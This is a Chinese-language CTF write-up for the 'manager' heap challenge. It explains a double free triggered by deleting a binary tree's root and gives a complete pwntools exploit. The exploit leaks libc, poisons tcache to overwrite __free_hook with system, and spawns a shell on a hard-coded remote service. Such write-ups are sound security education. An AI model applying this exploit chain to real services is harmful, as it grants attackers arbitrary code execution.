manager



WriteUp来源

来自Eqqie的博客

题目描述

Vulnerable data manager. Try to exploit!

题目考点

  • Double Free

解题思路

用二叉树管理内存的堆题,特定条件下删根节点会double free。

伪代码看得我血压升高,所以直接动态调试,确定一种能触发的情况:比如根节点同时有左、右子节点,且右子节点有两个叶子。这样 free 掉根节点时会出现 loop chain(即 double free 造成的循环链)。慢慢利用就行。

from pwn import *

# Local alternative, left disabled: run the binary under the bundled libc.
# p = process("./chall", env={"LD_PRELOAD": "./libc-2.27.so"})

# Tube to the challenge service (address as published in the write-up).
# It is created at import time; add()/delete()/show() all talk through it.
p = remote("47.105.94.48", 12243)

# Local libc copy, used by exp() for symbol lookups. The filename says
# glibc 2.27; the hard-coded leak offset in exp() presumably matches only
# this exact build.
libc = ELF("./libc-2.27.so")

# Target architecture and verbose logging of everything sent and received.
context.update(arch="amd64", log_level="debug")

# header: 0x555555554000+0x202018

def add(key: int, length: int, content):
    """Select menu option 1 and answer its key/len/content prompts.

    The write-up describes the service as keeping its records in a binary
    tree, so this is presumably the "insert node" operation.

    Args:
        key: Integer sent (as decimal text) at the ``key> `` prompt.
        length: Integer sent (as decimal text) at the ``len> `` prompt.
        content: Bytes sent at the ``content> `` prompt.
    """
    p.sendlineafter(b"> ", b"1")
    for prompt, number in ((b"key> ", key), (b"len> ", length)):
        p.sendlineafter(prompt, str(number).encode())
    # sendafter, not sendlineafter: the payload goes out without an added
    # newline, exactly as the caller built it.
    p.sendafter(b"content> ", content)

def delete(key: int):
    """Select menu option 2 and answer its ``key> `` prompt with `key`.

    Args:
        key: Integer sent (as decimal text) to identify the record to remove.
    """
    encoded_key = str(key).encode()
    p.sendlineafter(b"> ", b"2")
    p.sendlineafter(b"key> ", encoded_key)

def show():
    """Select menu option 3; the reply is left on `p` for the caller to read."""
    menu_prompt, choice = b"> ", b"3"
    p.sendlineafter(menu_prompt, choice)

def exp():
    """Replay the write-up's two stages against the service behind `p`.

    Stage 1 reads a libc pointer back out of a reused allocation; stage 2
    relies on the double free that the write-up attributes to deleting the
    tree's root node. The order of the add()/delete() calls is the whole
    point of the script and must not be rearranged.

    Reviewer notes (defensive context, not shown by the script itself):
      * Both stages stem from bugs in the service: a freed node that stays
        reachable, and an allocation handed back without being cleared.
        Clearing pointers on free and initialising buffers closes both.
      * The target libc is 2.27. glibc 2.29 added a tcache double-free
        check and glibc 2.34 removed ``__free_hook``, so this sequence is
        specific to old libc builds.
    """
    # --- leak libc ---
    # Two large records (labelled "unsorted" by the author; presumably sized
    # so that freeing them leaves libc pointers in the freed memory).
    for key, payload in ((1, b"unsorted"), (2, b"unsorted2")):
        add(key, 0x420, payload)
    for key in (1, 2):
        delete(key)

    # A small record with an 8-byte marker; show() then prints whatever
    # follows the marker up to the next newline.
    add(5, 0x10, b"5" * 8)
    show()
    p.recvuntil(b"55555555")
    raw_leak = p.recvuntil(b"\x0a", drop=True)
    libc_leak = u64(raw_leak.ljust(8, b"\x00"))

    # 0x3ec090 is the author's measured distance from the leaked pointer to
    # the libc load address for this libc build.
    libc_base = libc_leak - 0x3ec090
    system = libc_base + libc.symbols[b"system"]
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    for label, value in (
        ("libc_leak:", libc_leak),
        ("libc_base:", libc_base),
        ("system:", system),
    ):
        print(label, hex(value))

    # --- build double free ---
    # Key 5 is already in the tree. Assuming ordinary binary-search-tree
    # insertion (the service's code is not shown here), 4 ends up left of 5,
    # 7 right of 5, and 6 and 8 below 7: the shape the write-up describes.
    for key, payload in (
        (7, b"7" * 8),
        (6, b"6" * 8),
        (4, b"4" * 8),
        (8, b"8" * 8),
    ):
        add(key, 0x10, payload)
    delete(8)

    # Per the write-up, deleting the root in this shape frees memory twice.
    delete(5)
    # Three same-sized records follow: the first carries the address of
    # __free_hook, the third the address of system.
    # NOTE(review): presumably the duplicated free-list entry makes the third
    # allocation land on the hook; confirm under a debugger.
    add(10, 0x10, p64(free_hook))
    add(11, 0x10, b"/bin/sh\x00")
    add(12, 0x10, p64(system))
    print("free_hook:", hex(free_hook))

    # Deleting record 11 frees the buffer that holds the command string.
    delete(11)
    # gdb.attach(p)
    p.interactive()

# Script entry point. The module-level `p` opens the connection on import;
# exp() itself only runs when the file is executed directly.
if __name__ == "__main__":
    exp()